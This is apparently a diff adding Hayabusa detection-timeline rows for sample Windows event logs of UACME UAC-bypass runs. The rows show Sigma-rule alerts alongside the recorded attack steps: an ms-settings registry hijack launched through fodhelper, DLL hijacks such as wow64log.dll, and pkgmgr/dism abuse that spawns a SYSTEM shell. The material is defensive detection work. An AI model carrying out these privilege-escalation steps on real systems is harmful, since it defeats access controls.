+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
